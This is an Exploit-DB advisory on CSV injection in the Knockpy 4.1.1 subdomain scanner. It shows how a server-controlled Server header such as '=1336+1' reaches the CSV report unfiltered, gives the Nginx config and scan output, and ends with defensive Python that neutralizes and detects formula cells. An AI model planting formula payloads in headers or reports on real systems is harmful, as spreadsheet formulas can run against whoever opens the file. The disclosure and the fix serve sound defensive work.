Knockpy 4.1.1 – CSV Injection

  • Author: Dolev Farhi
    Date: 2021-01-04
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/49342/
  • # Exploit Title: Knockpy 4.1.1 - CSV Injection
    # Author: Dolev Farhi
    # Date: 2020-12-29
    # Vendor Homepage: https://github.com/guelfoweb/knock
    # Version : 4.1.1
    # Tested on: Debian 9.13
    
    Knockpy, as part of its subdomain brute-forcing flow against a remote domain, issues a HEAD request to each discovered host to fetch details such as the response headers and status code.
    When the -c flag is used to store the results as a CSV file, the value of the Server HTTP response header is written into the file unfiltered, so a server-controlled value that begins with a formula character lands directly in a cell of the report.
    
    Vulnerable code segment(s)
    
    # knockpy.py

    row = ip+'\t'+str(data['status'])+'\t'+'host'+'\t'+str(data['hostname'])+get_tab(data['hostname'])+str(server_type)
    subdomain_csv_list.append(ip+','+str(data['status'])+','+'host'+','+str(data['hostname'])+','+str(server_type))

    # modules/save_report.py

    if fields:
        csv_report += 'ip,status,type,domain_name,server\n'
    for item in report:
        csv_report += item + '\n'
    report = csv_report
    
    
    1. Example malicious Nginx config to return CSV formula headers:
    
    http {
    ...
    server_tokens off;
    more_set_headers 'Server: =1336+1';
    ...
    }
    
    2. Tester runs Knockpy
    root@host:~/# python knockpy/knockpy.py -c test.local
    
    + checking for virustotal subdomains: SKIP
    	VirusTotal API_KEY not found
    + checking for wildcard: NO
    + checking for zonetransfer: NO
    + resolving target: YES
    - scanning for subdomain...
    
    Ip Address	Status	Type	Domain Name			Server
    ----------	------	----	-----------			------
    127.0.0.1	200	host	appserver.test.local	=1336+1
    
    
    CSV result
    
    root@host:~/# cat test_local.csv
    127.0.0.1,200,host,appserver.test.local,=1336+1
    127.0.0.1,200,host,www.test.local,=1336+1
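
    As an added example (not Knockpy's own code), the following is a hardened replacement for the row-building and save_report logic quoted above: every cell is neutralized before it is written, the csv module handles quoting, and a small scanner flags formula-triggering cells in an existing report. The function names neutralize_csv_cell, build_csv_report and find_formula_cells are assumptions, and the sample rows are constructed from the advisory's output.

```python
import csv
import io

# Characters that spreadsheet applications interpret as the start of a formula.
# Tab and carriage return are included because they can end a cell early and
# let an injected value start a new one.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_csv_cell(value):
    """Return value made safe for a CSV cell (hypothetical helper, not Knockpy's).

    A leading formula trigger is prefixed with a single quote so spreadsheet
    software treats the cell as text; csv.writer below adds the field quoting
    and doubles any embedded double quotes.
    """
    text = str(value)
    if text.startswith(FORMULA_TRIGGERS):
        text = "'" + text
    return text


def build_csv_report(rows, fields=True):
    """Render scan rows to CSV text with every cell neutralized.

    rows: iterable of (ip, status, type, hostname, server_type) tuples,
    mirroring the columns Knockpy writes. Using csv.writer also keeps commas
    or newlines inside a value from breaking out of their field.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    if fields:
        writer.writerow(["ip", "status", "type", "domain_name", "server"])
    for row in rows:
        writer.writerow([neutralize_csv_cell(cell) for cell in row])
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Audit existing CSV text: return (row, column, value) for each cell a
    spreadsheet would evaluate as a formula."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell.startswith(FORMULA_TRIGGERS):
                hits.append((r, c, cell))
    return hits


# Constructed sample: the Server header value from the advisory above.
SAMPLE_ROWS = [
    ("127.0.0.1", 200, "host", "appserver.test.local", "=1336+1"),
    ("127.0.0.1", 200, "host", "www.test.local", "nginx"),
]
```

    Running find_formula_cells over the unpatched test_local.csv above reports the =1336+1 cell; running it over build_csv_report(SAMPLE_ROWS) reports nothing.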